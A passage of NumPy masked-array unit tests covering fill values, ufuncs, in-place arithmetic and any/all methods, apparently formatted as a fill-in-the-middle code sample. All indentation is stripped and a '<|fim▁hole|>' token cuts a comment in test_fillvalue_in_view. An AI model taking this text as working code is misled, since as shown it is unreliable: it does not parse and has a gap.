#assert_equal(fval.item(), [-999, -12345678.9, asbytes("???")])
#.....One-field-only flexible type should work as well
ndtype = [("a", int)]
fval = _check_fill_value(-999999999, ndtype)
self.assertTrue(isinstance(fval, ndarray))
assert_equal(fval.item(), (-999999999,))
def test_fillvalue_conversion(self):
# Tests the behavior of fill_value during conversion
# We had a tailored comment to make sure special attributes are
# properly dealt with
a = array(asbytes_nested(['3', '4', '5']))
a._optinfo.update({'comment':"updated!"})
b = array(a, dtype=int)
assert_equal(b._data, [3, 4, 5])
assert_equal(b.fill_value, default_fill_value(0))
b = array(a, dtype=float)
assert_equal(b._data, [3, 4, 5])
assert_equal(b.fill_value, default_fill_value(0.))
b = a.astype(int)
assert_equal(b._data, [3, 4, 5])
assert_equal(b.fill_value, default_fill_value(0))
assert_equal(b._optinfo['comment'], "updated!")
b = a.astype([('a', '|S3')])
assert_equal(b['a']._data, a._data)
assert_equal(b['a'].fill_value, a.fill_value)
def test_fillvalue(self):
# Yet more fun with the fill_value
data = masked_array([1, 2, 3], fill_value=-999)
series = data[[0, 2, 1]]
assert_equal(series._fill_value, data._fill_value)
mtype = [('f', float), ('s', '|S3')]
x = array([(1, 'a'), (2, 'b'), (pi, 'pi')], dtype=mtype)
x.fill_value = 999
assert_equal(x.fill_value.item(), [999., asbytes('999')])
assert_equal(x['f'].fill_value, 999)
assert_equal(x['s'].fill_value, asbytes('999'))
x.fill_value = (9, '???')
assert_equal(x.fill_value.item(), (9, asbytes('???')))
assert_equal(x['f'].fill_value, 9)
assert_equal(x['s'].fill_value, asbytes('???'))
x = array([1, 2, 3.1])
x.fill_value = 999
assert_equal(np.asarray(x.fill_value).dtype, float)
assert_equal(x.fill_value, 999.)
assert_equal(x._fill_value, np.array(999.))
def test_fillvalue_exotic_dtype(self):
# Tests yet more exotic flexible dtypes
_check_fill_value = np.ma.core._check_fill_value
ndtype = [('i', int), ('s', '|S8'), ('f', float)]
control = np.array((default_fill_value(0),
default_fill_value('0'),
default_fill_value(0.),),
dtype=ndtype)
assert_equal(_check_fill_value(None, ndtype), control)
# The shape shouldn't matter
ndtype = [('f0', float, (2, 2))]
control = np.array((default_fill_value(0.),),
dtype=[('f0', float)]).astype(ndtype)
assert_equal(_check_fill_value(None, ndtype), control)
control = np.array((0,), dtype=[('f0', float)]).astype(ndtype)
assert_equal(_check_fill_value(0, ndtype), control)
ndtype = np.dtype("int, (2,3)float, float")
control = np.array((default_fill_value(0),
default_fill_value(0.),
default_fill_value(0.),),
dtype="int, float, float").astype(ndtype)
test = _check_fill_value(None, ndtype)
assert_equal(test, control)
control = np.array((0, 0, 0), dtype="int, float, float").astype(ndtype)
assert_equal(_check_fill_value(0, ndtype), control)
def test_fillvalue_datetime_timedelta(self):
# Test default fillvalue for datetime64 and timedelta64 types.
# See issue #4476, this would return '?' which would cause errors
# elsewhere
for timecode in ("as", "fs", "ps", "ns", "us", "ms", "s", "m",
"h", "D", "W", "M", "Y"):
control = numpy.datetime64("NaT", timecode)
test = default_fill_value(numpy.dtype("<M8[" + timecode + "]"))
assert_equal(test, control)
control = numpy.timedelta64("NaT", timecode)
test = default_fill_value(numpy.dtype("<m8[" + timecode + "]"))
assert_equal(test, control)
def test_extremum_fill_value(self):
# Tests extremum fill values for flexible type.
a = array([(1, (2, 3)), (4, (5, 6))],
dtype=[('A', int), ('B', [('BA', int), ('BB', int)])])
test = a.fill_value
assert_equal(test['A'], default_fill_value(a['A']))
assert_equal(test['B']['BA'], default_fill_value(a['B']['BA']))
assert_equal(test['B']['BB'], default_fill_value(a['B']['BB']))
test = minimum_fill_value(a)
assert_equal(test[0], minimum_fill_value(a['A']))
assert_equal(test[1][0], minimum_fill_value(a['B']['BA']))
assert_equal(test[1][1], minimum_fill_value(a['B']['BB']))
assert_equal(test[1], minimum_fill_value(a['B']))
test = maximum_fill_value(a)
assert_equal(test[0], maximum_fill_value(a['A']))
assert_equal(test[1][0], maximum_fill_value(a['B']['BA']))
assert_equal(test[1][1], maximum_fill_value(a['B']['BB']))
assert_equal(test[1], maximum_fill_value(a['B']))
def test_fillvalue_individual_fields(self):
# Test setting fill_value on individual fields
ndtype = [('a', int), ('b', int)]
# Explicit fill_value
a = array(list(zip([1, 2, 3], [4, 5, 6])),
fill_value=(-999, -999), dtype=ndtype)
aa = a['a']
aa.set_fill_value(10)
assert_equal(aa._fill_value, np.array(10))
assert_equal(tuple(a.fill_value), (10, -999))
a.fill_value['b'] = -10
assert_equal(tuple(a.fill_value), (10, -10))
# Implicit fill_value
t = array(list(zip([1, 2, 3], [4, 5, 6])), dtype=ndtype)
tt = t['a']
tt.set_fill_value(10)
assert_equal(tt._fill_value, np.array(10))
assert_equal(tuple(t.fill_value), (10, default_fill_value(0)))
def test_fillvalue_implicit_structured_array(self):
# Check that fill_value is always defined for structured arrays
ndtype = ('b', float)
adtype = ('a', float)
a = array([(1.,), (2.,)], mask=[(False,), (False,)],
fill_value=(np.nan,), dtype=np.dtype([adtype]))
b = empty(a.shape, dtype=[adtype, ndtype])
b['a'] = a['a']
b['a'].set_fill_value(a['a'].fill_value)
f = b._fill_value[()]
assert_(np.isnan(f[0]))
assert_equal(f[-1], default_fill_value(1.))
def test_fillvalue_as_arguments(self):
# Test adding a fill_value parameter to empty/ones/zeros
a = empty(3, fill_value=999.)
assert_equal(a.fill_value, 999.)
a = ones(3, fill_value=999., dtype=float)
assert_equal(a.fill_value, 999.)
a = zeros(3, fill_value=0., dtype=complex)
assert_equal(a.fill_value, 0.)
a = identity(3, fill_value=0., dtype=complex)
assert_equal(a.fill_value, 0.)
def test_shape_argument(self):
# Test that shape can be provides as an argument
# GH issue 6106
a = empty(shape=(3, ))
assert_equal(a.shape, (3, ))
a = ones(shape=(3, ), dtype=float)
assert_equal(a.shape, (3, ))
a = zeros(shape=(3, ), dtype=complex)
assert_equal(a.shape, (3, ))
def test_fillvalue_in_view(self):
# Test the behavior of fill_value in view
# Create initial masked array
x = array([1, 2, 3], fill_value=1, dtype=np.int64)
# Check that fill_value is preserved by default
y = x.view()
assert_(y.fill_value == 1)
# Check that fill_value is preserved if dtype is specified and the
# dtype is an ndarray sub-class and has a _fill_value attribute
y = x.view(MaskedArray)
assert_(y.fill_value == 1)
# Check that fill_value is preserved if type is specified and the<|fim▁hole|> # default, the first argument is dtype, not type)
y = x.view(type=MaskedArray)
assert_(y.fill_value == 1)
# Check that code does not crash if passed an ndarray sub-class that
# does not have a _fill_value attribute
y = x.view(np.ndarray)
y = x.view(type=np.ndarray)
# Check that fill_value can be overriden with view
y = x.view(MaskedArray, fill_value=2)
assert_(y.fill_value == 2)
# Check that fill_value can be overriden with view (using type=)
y = x.view(type=MaskedArray, fill_value=2)
assert_(y.fill_value == 2)
# Check that fill_value gets reset if passed a dtype but not a
# fill_value. This is because even though in some cases one can safely
# cast the fill_value, e.g. if taking an int64 view of an int32 array,
# in other cases, this cannot be done (e.g. int32 view of an int64
# array with a large fill_value).
y = x.view(dtype=np.int32)
assert_(y.fill_value == 999999)
class TestUfuncs(TestCase):
# Test class for the application of ufuncs on MaskedArrays.
def setUp(self):
# Base data definition.
self.d = (array([1.0, 0, -1, pi / 2] * 2, mask=[0, 1] + [0] * 6),
array([1.0, 0, -1, pi / 2] * 2, mask=[1, 0] + [0] * 6),)
self.err_status = np.geterr()
np.seterr(divide='ignore', invalid='ignore')
def tearDown(self):
np.seterr(**self.err_status)
def test_testUfuncRegression(self):
# Tests new ufuncs on MaskedArrays.
for f in ['sqrt', 'log', 'log10', 'exp', 'conjugate',
'sin', 'cos', 'tan',
'arcsin', 'arccos', 'arctan',
'sinh', 'cosh', 'tanh',
'arcsinh',
'arccosh',
'arctanh',
'absolute', 'fabs', 'negative',
# 'nonzero', 'around',
'floor', 'ceil',
# 'sometrue', 'alltrue',
'logical_not',
'add', 'subtract', 'multiply',
'divide', 'true_divide', 'floor_divide',
'remainder', 'fmod', 'hypot', 'arctan2',
'equal', 'not_equal', 'less_equal', 'greater_equal',
'less', 'greater',
'logical_and', 'logical_or', 'logical_xor',
]:
try:
uf = getattr(umath, f)
except AttributeError:
uf = getattr(fromnumeric, f)
mf = getattr(numpy.ma.core, f)
args = self.d[:uf.nin]
ur = uf(*args)
mr = mf(*args)
assert_equal(ur.filled(0), mr.filled(0), f)
assert_mask_equal(ur.mask, mr.mask, err_msg=f)
def test_reduce(self):
# Tests reduce on MaskedArrays.
a = self.d[0]
self.assertTrue(not alltrue(a, axis=0))
self.assertTrue(sometrue(a, axis=0))
assert_equal(sum(a[:3], axis=0), 0)
assert_equal(product(a, axis=0), 0)
assert_equal(add.reduce(a), pi)
def test_minmax(self):
# Tests extrema on MaskedArrays.
a = arange(1, 13).reshape(3, 4)
amask = masked_where(a < 5, a)
assert_equal(amask.max(), a.max())
assert_equal(amask.min(), 5)
assert_equal(amask.max(0), a.max(0))
assert_equal(amask.min(0), [5, 6, 7, 8])
self.assertTrue(amask.max(1)[0].mask)
self.assertTrue(amask.min(1)[0].mask)
def test_ndarray_mask(self):
# Check that the mask of the result is a ndarray (not a MaskedArray...)
a = masked_array([-1, 0, 1, 2, 3], mask=[0, 0, 0, 0, 1])
test = np.sqrt(a)
control = masked_array([-1, 0, 1, np.sqrt(2), -1],
mask=[1, 0, 0, 0, 1])
assert_equal(test, control)
assert_equal(test.mask, control.mask)
self.assertTrue(not isinstance(test.mask, MaskedArray))
def test_treatment_of_NotImplemented(self):
# Check that NotImplemented is returned at appropriate places
a = masked_array([1., 2.], mask=[1, 0])
self.assertRaises(TypeError, operator.mul, a, "abc")
self.assertRaises(TypeError, operator.truediv, a, "abc")
class MyClass(object):
__array_priority__ = a.__array_priority__ + 1
def __mul__(self, other):
return "My mul"
def __rmul__(self, other):
return "My rmul"
me = MyClass()
assert_(me * a == "My mul")
assert_(a * me == "My rmul")
# and that __array_priority__ is respected
class MyClass2(object):
__array_priority__ = 100
def __mul__(self, other):
return "Me2mul"
def __rmul__(self, other):
return "Me2rmul"
def __rdiv__(self, other):
return "Me2rdiv"
__rtruediv__ = __rdiv__
me_too = MyClass2()
assert_(a.__mul__(me_too) is NotImplemented)
assert_(all(multiply.outer(a, me_too) == "Me2rmul"))
assert_(a.__truediv__(me_too) is NotImplemented)
assert_(me_too * a == "Me2mul")
assert_(a * me_too == "Me2rmul")
assert_(a / me_too == "Me2rdiv")
class TestMaskedArrayInPlaceArithmetics(TestCase):
# Test MaskedArray Arithmetics
def setUp(self):
x = arange(10)
y = arange(10)
xm = arange(10)
xm[2] = masked
self.intdata = (x, y, xm)
self.floatdata = (x.astype(float), y.astype(float), xm.astype(float))
self.othertypes = np.typecodes['AllInteger'] + np.typecodes['AllFloat']
self.othertypes = [np.dtype(_).type for _ in self.othertypes]
self.uint8data = (
x.astype(np.uint8),
y.astype(np.uint8),
xm.astype(np.uint8)
)
def test_inplace_addition_scalar(self):
# Test of inplace additions
(x, y, xm) = self.intdata
xm[2] = masked
x += 1
assert_equal(x, y + 1)
xm += 1
assert_equal(xm, y + 1)
(x, _, xm) = self.floatdata
id1 = x.data.ctypes._data
x += 1.
assert_(id1 == x.data.ctypes._data)
assert_equal(x, y + 1.)
def test_inplace_addition_array(self):
# Test of inplace additions
(x, y, xm) = self.intdata
m = xm.mask
a = arange(10, dtype=np.int16)
a[-1] = masked
x += a
xm += a
assert_equal(x, y + a)
assert_equal(xm, y + a)
assert_equal(xm.mask, mask_or(m, a.mask))
def test_inplace_subtraction_scalar(self):
# Test of inplace subtractions
(x, y, xm) = self.intdata
x -= 1
assert_equal(x, y - 1)
xm -= 1
assert_equal(xm, y - 1)
def test_inplace_subtraction_array(self):
# Test of inplace subtractions
(x, y, xm) = self.floatdata
m = xm.mask
a = arange(10, dtype=float)
a[-1] = masked
x -= a
xm -= a
assert_equal(x, y - a)
assert_equal(xm, y - a)
assert_equal(xm.mask, mask_or(m, a.mask))
def test_inplace_multiplication_scalar(self):
# Test of inplace multiplication
(x, y, xm) = self.floatdata
x *= 2.0
assert_equal(x, y * 2)
xm *= 2.0
assert_equal(xm, y * 2)
def test_inplace_multiplication_array(self):
# Test of inplace multiplication
(x, y, xm) = self.floatdata
m = xm.mask
a = arange(10, dtype=float)
a[-1] = masked
x *= a
xm *= a
assert_equal(x, y * a)
assert_equal(xm, y * a)
assert_equal(xm.mask, mask_or(m, a.mask))
def test_inplace_division_scalar_int(self):
# Test of inplace division
(x, y, xm) = self.intdata
x = arange(10) * 2
xm = arange(10) * 2
xm[2] = masked
x //= 2
assert_equal(x, y)
xm //= 2
assert_equal(xm, y)
def test_inplace_division_scalar_float(self):
# Test of inplace division
(x, y, xm) = self.floatdata
x /= 2.0
assert_equal(x, y / 2.0)
xm /= arange(10)
assert_equal(xm, ones((10,)))
def test_inplace_division_array_float(self):
# Test of inplace division
(x, y, xm) = self.floatdata
m = xm.mask
a = arange(10, dtype=float)
a[-1] = masked
x /= a
xm /= a
assert_equal(x, y / a)
assert_equal(xm, y / a)
assert_equal(xm.mask, mask_or(mask_or(m, a.mask), (a == 0)))
def test_inplace_division_misc(self):
x = [1., 1., 1., -2., pi / 2., 4., 5., -10., 10., 1., 2., 3.]
y = [5., 0., 3., 2., -1., -4., 0., -10., 10., 1., 0., 3.]
m1 = [1, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0]
m2 = [0, 0, 1, 0, 0, 1, 1, 0, 0, 0, 0, 1]
xm = masked_array(x, mask=m1)
ym = masked_array(y, mask=m2)
z = xm / ym
assert_equal(z._mask, [1, 1, 1, 0, 0, 1, 1, 0, 0, 0, 1, 1])
assert_equal(z._data,
[1., 1., 1., -1., -pi / 2., 4., 5., 1., 1., 1., 2., 3.])
#assert_equal(z._data, [0.2,1.,1./3.,-1.,-pi/2.,-1.,5.,1.,1.,1.,2.,1.])
xm = xm.copy()
xm /= ym
assert_equal(xm._mask, [1, 1, 1, 0, 0, 1, 1, 0, 0, 0, 1, 1])
assert_equal(z._data,
[1., 1., 1., -1., -pi / 2., 4., 5., 1., 1., 1., 2., 3.])
#assert_equal(xm._data,
# [1/5.,1.,1./3.,-1.,-pi/2.,-1.,5.,1.,1.,1.,2.,1.])
def test_datafriendly_add(self):
# Test keeping data w/ (inplace) addition
x = array([1, 2, 3], mask=[0, 0, 1])
# Test add w/ scalar
xx = x + 1
assert_equal(xx.data, [2, 3, 3])
assert_equal(xx.mask, [0, 0, 1])
# Test iadd w/ scalar
x += 1
assert_equal(x.data, [2, 3, 3])
assert_equal(x.mask, [0, 0, 1])
# Test add w/ array
x = array([1, 2, 3], mask=[0, 0, 1])
xx = x + array([1, 2, 3], mask=[1, 0, 0])
assert_equal(xx.data, [1, 4, 3])
assert_equal(xx.mask, [1, 0, 1])
# Test iadd w/ array
x = array([1, 2, 3], mask=[0, 0, 1])
x += array([1, 2, 3], mask=[1, 0, 0])
assert_equal(x.data, [1, 4, 3])
assert_equal(x.mask, [1, 0, 1])
def test_datafriendly_sub(self):
# Test keeping data w/ (inplace) subtraction
# Test sub w/ scalar
x = array([1, 2, 3], mask=[0, 0, 1])
xx = x - 1
assert_equal(xx.data, [0, 1, 3])
assert_equal(xx.mask, [0, 0, 1])
# Test isub w/ scalar
x = array([1, 2, 3], mask=[0, 0, 1])
x -= 1
assert_equal(x.data, [0, 1, 3])
assert_equal(x.mask, [0, 0, 1])
# Test sub w/ array
x = array([1, 2, 3], mask=[0, 0, 1])
xx = x - array([1, 2, 3], mask=[1, 0, 0])
assert_equal(xx.data, [1, 0, 3])
assert_equal(xx.mask, [1, 0, 1])
# Test isub w/ array
x = array([1, 2, 3], mask=[0, 0, 1])
x -= array([1, 2, 3], mask=[1, 0, 0])
assert_equal(x.data, [1, 0, 3])
assert_equal(x.mask, [1, 0, 1])
def test_datafriendly_mul(self):
# Test keeping data w/ (inplace) multiplication
# Test mul w/ scalar
x = array([1, 2, 3], mask=[0, 0, 1])
xx = x * 2
assert_equal(xx.data, [2, 4, 3])
assert_equal(xx.mask, [0, 0, 1])
# Test imul w/ scalar
x = array([1, 2, 3], mask=[0, 0, 1])
x *= 2
assert_equal(x.data, [2, 4, 3])
assert_equal(x.mask, [0, 0, 1])
# Test mul w/ array
x = array([1, 2, 3], mask=[0, 0, 1])
xx = x * array([10, 20, 30], mask=[1, 0, 0])
assert_equal(xx.data, [1, 40, 3])
assert_equal(xx.mask, [1, 0, 1])
# Test imul w/ array
x = array([1, 2, 3], mask=[0, 0, 1])
x *= array([10, 20, 30], mask=[1, 0, 0])
assert_equal(x.data, [1, 40, 3])
assert_equal(x.mask, [1, 0, 1])
def test_datafriendly_div(self):
# Test keeping data w/ (inplace) division
# Test div on scalar
x = array([1, 2, 3], mask=[0, 0, 1])
xx = x / 2.
assert_equal(xx.data, [1 / 2., 2 / 2., 3])
assert_equal(xx.mask, [0, 0, 1])
# Test idiv on scalar
x = array([1., 2., 3.], mask=[0, 0, 1])
x /= 2.
assert_equal(x.data, [1 / 2., 2 / 2., 3])
assert_equal(x.mask, [0, 0, 1])
# Test div on array
x = array([1., 2., 3.], mask=[0, 0, 1])
xx = x / array([10., 20., 30.], mask=[1, 0, 0])
assert_equal(xx.data, [1., 2. / 20., 3.])
assert_equal(xx.mask, [1, 0, 1])
# Test idiv on array
x = array([1., 2., 3.], mask=[0, 0, 1])
x /= array([10., 20., 30.], mask=[1, 0, 0])
assert_equal(x.data, [1., 2 / 20., 3.])
assert_equal(x.mask, [1, 0, 1])
def test_datafriendly_pow(self):
# Test keeping data w/ (inplace) power
# Test pow on scalar
x = array([1., 2., 3.], mask=[0, 0, 1])
xx = x ** 2.5
assert_equal(xx.data, [1., 2. ** 2.5, 3.])
assert_equal(xx.mask, [0, 0, 1])
# Test ipow on scalar
x **= 2.5
assert_equal(x.data, [1., 2. ** 2.5, 3])
assert_equal(x.mask, [0, 0, 1])
def test_datafriendly_add_arrays(self):
a = array([[1, 1], [3, 3]])
b = array([1, 1], mask=[0, 0])
a += b
assert_equal(a, [[2, 2], [4, 4]])
if a.mask is not nomask:
assert_equal(a.mask, [[0, 0], [0, 0]])
a = array([[1, 1], [3, 3]])
b = array([1, 1], mask=[0, 1])
a += b
assert_equal(a, [[2, 2], [4, 4]])
assert_equal(a.mask, [[0, 1], [0, 1]])
def test_datafriendly_sub_arrays(self):
a = array([[1, 1], [3, 3]])
b = array([1, 1], mask=[0, 0])
a -= b
assert_equal(a, [[0, 0], [2, 2]])
if a.mask is not nomask:
assert_equal(a.mask, [[0, 0], [0, 0]])
a = array([[1, 1], [3, 3]])
b = array([1, 1], mask=[0, 1])
a -= b
assert_equal(a, [[0, 0], [2, 2]])
assert_equal(a.mask, [[0, 1], [0, 1]])
def test_datafriendly_mul_arrays(self):
a = array([[1, 1], [3, 3]])
b = array([1, 1], mask=[0, 0])
a *= b
assert_equal(a, [[1, 1], [3, 3]])
if a.mask is not nomask:
assert_equal(a.mask, [[0, 0], [0, 0]])
a = array([[1, 1], [3, 3]])
b = array([1, 1], mask=[0, 1])
a *= b
assert_equal(a, [[1, 1], [3, 3]])
assert_equal(a.mask, [[0, 1], [0, 1]])
def test_inplace_addition_scalar_type(self):
# Test of inplace additions
for t in self.othertypes:
with warnings.catch_warnings(record=True) as w:
warnings.filterwarnings("always")
(x, y, xm) = (_.astype(t) for _ in self.uint8data)
xm[2] = masked
x += t(1)
assert_equal(x, y + t(1))
xm += t(1)
assert_equal(xm, y + t(1))
assert_equal(len(w), 0, "Failed on type=%s." % t)
def test_inplace_addition_array_type(self):
# Test of inplace additions
for t in self.othertypes:
with warnings.catch_warnings(record=True) as w:
warnings.filterwarnings("always")
(x, y, xm) = (_.astype(t) for _ in self.uint8data)
m = xm.mask
a = arange(10, dtype=t)
a[-1] = masked
x += a
xm += a
assert_equal(x, y + a)
assert_equal(xm, y + a)
assert_equal(xm.mask, mask_or(m, a.mask))
assert_equal(len(w), 0, "Failed on type=%s." % t)
def test_inplace_subtraction_scalar_type(self):
# Test of inplace subtractions
for t in self.othertypes:
with warnings.catch_warnings(record=True) as w:
warnings.filterwarnings("always")
(x, y, xm) = (_.astype(t) for _ in self.uint8data)
x -= t(1)
assert_equal(x, y - t(1))
xm -= t(1)
assert_equal(xm, y - t(1))
assert_equal(len(w), 0, "Failed on type=%s." % t)
def test_inplace_subtraction_array_type(self):
# Test of inplace subtractions
for t in self.othertypes:
with warnings.catch_warnings(record=True) as w:
warnings.filterwarnings("always")
(x, y, xm) = (_.astype(t) for _ in self.uint8data)
m = xm.mask
a = arange(10, dtype=t)
a[-1] = masked
x -= a
xm -= a
assert_equal(x, y - a)
assert_equal(xm, y - a)
assert_equal(xm.mask, mask_or(m, a.mask))
assert_equal(len(w), 0, "Failed on type=%s." % t)
def test_inplace_multiplication_scalar_type(self):
# Test of inplace multiplication
for t in self.othertypes:
with warnings.catch_warnings(record=True) as w:
warnings.filterwarnings("always")
(x, y, xm) = (_.astype(t) for _ in self.uint8data)
x *= t(2)
assert_equal(x, y * t(2))
xm *= t(2)
assert_equal(xm, y * t(2))
assert_equal(len(w), 0, "Failed on type=%s." % t)
def test_inplace_multiplication_array_type(self):
# Test of inplace multiplication
for t in self.othertypes:
with warnings.catch_warnings(record=True) as w:
warnings.filterwarnings("always")
(x, y, xm) = (_.astype(t) for _ in self.uint8data)
m = xm.mask
a = arange(10, dtype=t)
a[-1] = masked
x *= a
xm *= a
assert_equal(x, y * a)
assert_equal(xm, y * a)
assert_equal(xm.mask, mask_or(m, a.mask))
assert_equal(len(w), 0, "Failed on type=%s." % t)
def test_inplace_floor_division_scalar_type(self):
# Test of inplace division
for t in self.othertypes:
with warnings.catch_warnings(record=True) as w:
warnings.filterwarnings("always")
(x, y, xm) = (_.astype(t) for _ in self.uint8data)
x = arange(10, dtype=t) * t(2)
xm = arange(10, dtype=t) * t(2)
xm[2] = masked
x //= t(2)
xm //= t(2)
assert_equal(x, y)
assert_equal(xm, y)
assert_equal(len(w), 0, "Failed on type=%s." % t)
def test_inplace_floor_division_array_type(self):
# Test of inplace division
for t in self.othertypes:
with warnings.catch_warnings(record=True) as w:
warnings.filterwarnings("always")
(x, y, xm) = (_.astype(t) for _ in self.uint8data)
m = xm.mask
a = arange(10, dtype=t)
a[-1] = masked
x //= a
xm //= a
assert_equal(x, y // a)
assert_equal(xm, y // a)
assert_equal(
xm.mask,
mask_or(mask_or(m, a.mask), (a == t(0)))
)
assert_equal(len(w), 0, "Failed on type=%s." % t)
def test_inplace_division_scalar_type(self):
# Test of inplace division
for t in self.othertypes:
with warnings.catch_warnings(record=True) as w:
warnings.filterwarnings("always")
(x, y, xm) = (_.astype(t) for _ in self.uint8data)
x = arange(10, dtype=t) * t(2)
xm = arange(10, dtype=t) * t(2)
xm[2] = masked
# May get a DeprecationWarning or a TypeError.
#
# This is a consequence of the fact that this is true divide
# and will require casting to float for calculation and
# casting back to the original type. This will only be raised
# with integers. Whether it is an error or warning is only
# dependent on how stringent the casting rules are.
#
# Will handle the same way.
try:
x /= t(2)
assert_equal(x, y)
except (DeprecationWarning, TypeError) as e:
warnings.warn(str(e))
try:
xm /= t(2)
assert_equal(xm, y)
except (DeprecationWarning, TypeError) as e:
warnings.warn(str(e))
if issubclass(t, np.integer):
assert_equal(len(w), 2, "Failed on type=%s." % t)
else:
assert_equal(len(w), 0, "Failed on type=%s." % t)
def test_inplace_division_array_type(self):
# Test of inplace division
for t in self.othertypes:
with warnings.catch_warnings(record=True) as w:
warnings.filterwarnings("always")
(x, y, xm) = (_.astype(t) for _ in self.uint8data)
m = xm.mask
a = arange(10, dtype=t)
a[-1] = masked
# May get a DeprecationWarning or a TypeError.
#
# This is a consequence of the fact that this is true divide
# and will require casting to float for calculation and
# casting back to the original type. This will only be raised
# with integers. Whether it is an error or warning is only
# dependent on how stringent the casting rules are.
#
# Will handle the same way.
try:
x /= a
assert_equal(x, y / a)
except (DeprecationWarning, TypeError) as e:
warnings.warn(str(e))
try:
xm /= a
assert_equal(xm, y / a)
assert_equal(
xm.mask,
mask_or(mask_or(m, a.mask), (a == t(0)))
)
except (DeprecationWarning, TypeError) as e:
warnings.warn(str(e))
if issubclass(t, np.integer):
assert_equal(len(w), 2, "Failed on type=%s." % t)
else:
assert_equal(len(w), 0, "Failed on type=%s." % t)
def test_inplace_pow_type(self):
# Test keeping data w/ (inplace) power
for t in self.othertypes:
with warnings.catch_warnings(record=True) as w:
warnings.filterwarnings("always")
# Test pow on scalar
x = array([1, 2, 3], mask=[0, 0, 1], dtype=t)
xx = x ** t(2)
xx_r = array([1, 2 ** 2, 3], mask=[0, 0, 1], dtype=t)
assert_equal(xx.data, xx_r.data)
assert_equal(xx.mask, xx_r.mask)
# Test ipow on scalar
x **= t(2)
assert_equal(x.data, xx_r.data)
assert_equal(x.mask, xx_r.mask)
assert_equal(len(w), 0, "Failed on type=%s." % t)
class TestMaskedArrayMethods(TestCase):
# Test class for miscellaneous MaskedArrays methods.
def setUp(self):
# Base data definition.
x = np.array([8.375, 7.545, 8.828, 8.5, 1.757, 5.928,
8.43, 7.78, 9.865, 5.878, 8.979, 4.732,
3.012, 6.022, 5.095, 3.116, 5.238, 3.957,
6.04, 9.63, 7.712, 3.382, 4.489, 6.479,
7.189, 9.645, 5.395, 4.961, 9.894, 2.893,
7.357, 9.828, 6.272, 3.758, 6.693, 0.993])
X = x.reshape(6, 6)
XX = x.reshape(3, 2, 2, 3)
m = np.array([0, 1, 0, 1, 0, 0,
1, 0, 1, 1, 0, 1,
0, 0, 0, 1, 0, 1,
0, 0, 0, 1, 1, 1,
1, 0, 0, 1, 0, 0,
0, 0, 1, 0, 1, 0])
mx = array(data=x, mask=m)
mX = array(data=X, mask=m.reshape(X.shape))
mXX = array(data=XX, mask=m.reshape(XX.shape))
m2 = np.array([1, 1, 0, 1, 0, 0,
1, 1, 1, 1, 0, 1,
0, 0, 1, 1, 0, 1,
0, 0, 0, 1, 1, 1,
1, 0, 0, 1, 1, 0,
0, 0, 1, 0, 1, 1])
m2x = array(data=x, mask=m2)
m2X = array(data=X, mask=m2.reshape(X.shape))
m2XX = array(data=XX, mask=m2.reshape(XX.shape))
self.d = (x, X, XX, m, mx, mX, mXX, m2x, m2X, m2XX)
def test_generic_methods(self):
# Tests some MaskedArray methods.
a = array([1, 3, 2])
assert_equal(a.any(), a._data.any())
assert_equal(a.all(), a._data.all())
assert_equal(a.argmax(), a._data.argmax())
assert_equal(a.argmin(), a._data.argmin())
assert_equal(a.choose(0, 1, 2, 3, 4), a._data.choose(0, 1, 2, 3, 4))
assert_equal(a.compress([1, 0, 1]), a._data.compress([1, 0, 1]))
assert_equal(a.conj(), a._data.conj())
assert_equal(a.conjugate(), a._data.conjugate())
m = array([[1, 2], [3, 4]])
assert_equal(m.diagonal(), m._data.diagonal())
assert_equal(a.sum(), a._data.sum())
assert_equal(a.take([1, 2]), a._data.take([1, 2]))
assert_equal(m.transpose(), m._data.transpose())
def test_allclose(self):
# Tests allclose on arrays
a = np.random.rand(10)
b = a + np.random.rand(10) * 1e-8
self.assertTrue(allclose(a, b))
# Test allclose w/ infs
a[0] = np.inf
self.assertTrue(not allclose(a, b))
b[0] = np.inf
self.assertTrue(allclose(a, b))
# Test all close w/ masked
a = masked_array(a)
a[-1] = masked
self.assertTrue(allclose(a, b, masked_equal=True))
self.assertTrue(not allclose(a, b, masked_equal=False))
# Test comparison w/ scalar
a *= 1e-8
a[0] = 0
self.assertTrue(allclose(a, 0, masked_equal=True))
# Test that the function works for MIN_INT integer typed arrays
a = masked_array([np.iinfo(np.int_).min], dtype=np.int_)
self.assertTrue(allclose(a, a))
def test_allany(self):
# Checks the any/all methods/functions.
x = np.array([[0.13, 0.26, 0.90],
[0.28, 0.33, 0.63],
[0.31, 0.87, 0.70]])
m = np.array([[True, False, False],
[False, False, False],
[True, True, False]], dtype=np.bool_)
mx = masked_array(x, mask=m)
mxbig = (mx > 0.5)
mxsmall = (mx < 0.5)
self.assertFalse(mxbig.all())
self.assertTrue(mxbig.any())
assert_equal(mxbig.all(0), [False, False, True])
assert_equal(mxbig.all(1), [False, False, True])
assert_equal(mxbig.any(0), [False, False, True])
assert_equal(mxbig.any(1), [True, True, True])
self.assertFalse(mxsmall.all())
self.assertTrue(mxsmall.any())
assert_equal(mxsmall.all(0), [True, True, False])
assert_equal(mxsmall.all(1), [False, False, False])
assert_equal(mxsmall.any(0), [True, True, False])
assert_equal(mxsmall.any(1), [True, True, False])
def test_allany_onmatrices(self):
x = np.array([[0.13, 0.26, 0.90],
[0.28, 0.33, 0.63],
[0.31, 0.87, 0.70]])
X = np.matrix(x)
m = np.array([[True, False, False],
[False, False, False],
[True, True, False]], dtype=np.bool_)
mX = masked_array(X, mask=m)
mXbig = (mX > 0.5)
mXsmall = (mX < 0.5)
self.assertFalse(mXbig.all())
self.assertTrue(mXbig.any())
assert_equal(mXbig.all(0), np.matrix([False, False, True]))
assert_equal(mXbig.all(1), np.matrix([False, False, True]).T)
assert_equal(mXbig.any(0), np.matrix([False, False, True]))
assert_equal(mXbig.any(1), np.matrix([True, True, True]).T)
self.assertFalse(mXsmall.all())
self.assertTrue(mXsmall.any())
assert_equal(mXsmall.all(0), np.matrix([True, True, False]))
assert_equal(mXsmall.all(1), np.matrix([False, False, False]).T)
assert_equal(mXsmall.any(0), np.matrix([True, True, False]))
assert_equal(mXsmall.any(1), np.matrix([True, True, False]).T)
def test_allany_oddities(self):
# Some fun with all and any
store = empty((), dtype=bool)
full = array([1, 2, 3], mask=True)
self.assertTrue(full.all() is masked)
full.all(out=store)
self.assertTrue(store)
self.assertTrue(store._mask, True)
self.assertTrue(store is not masked)
store = empty((), dtype=bool)
self.assertTrue(full.any() is masked)
full.any(out=store)
self.assertTrue(not store)
self.assertTrue(store._mask, True)
self.assertTrue(store is not masked)
